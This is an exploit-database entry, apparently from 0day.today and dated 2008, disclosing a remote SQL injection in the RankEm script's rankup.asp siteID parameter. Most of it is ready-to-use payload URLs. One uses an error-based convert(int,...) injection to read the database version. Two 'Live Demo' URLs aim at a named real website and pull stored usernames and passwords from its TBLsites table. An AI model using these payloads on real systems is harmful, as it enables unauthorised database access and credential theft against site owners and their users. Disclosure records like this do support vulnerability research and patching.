id: 4357
date: 12/05/2008
title: RankEm (rankup.asp siteID) Remote SQL Injection Vulnerability
author: AlpHaNiX
cves: 

=============================================================
RankEm (rankup.asp siteID) Remote SQL Injection Vulnerability
=============================================================


###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################


----------------------------------------------------------

#found by : OffensiveTrack
#Author   : AlpHaNiX

###########################################################################

#script   : RankEm
#download : http://www.katywhitton.com/downloads/rankEm/rankEmDL.zip


#Exploit :
http://target.com/rankup.asp?siteID=convert(int,(select+@@version));--

#Live Demo
http://www.top50.co.nz/rankup.asp?siteID=convert(int,(select+top+1+siteUserName+from+TBLsites));--

http://www.top50.co.nz/rankup.asp?siteID=convert(int,(select+top+1+sitePassword+from+TBLsites));--

#Greetz For W!nd[O]ws my partner :)

###########################################################################



#  0day.today [2023-03-21]  #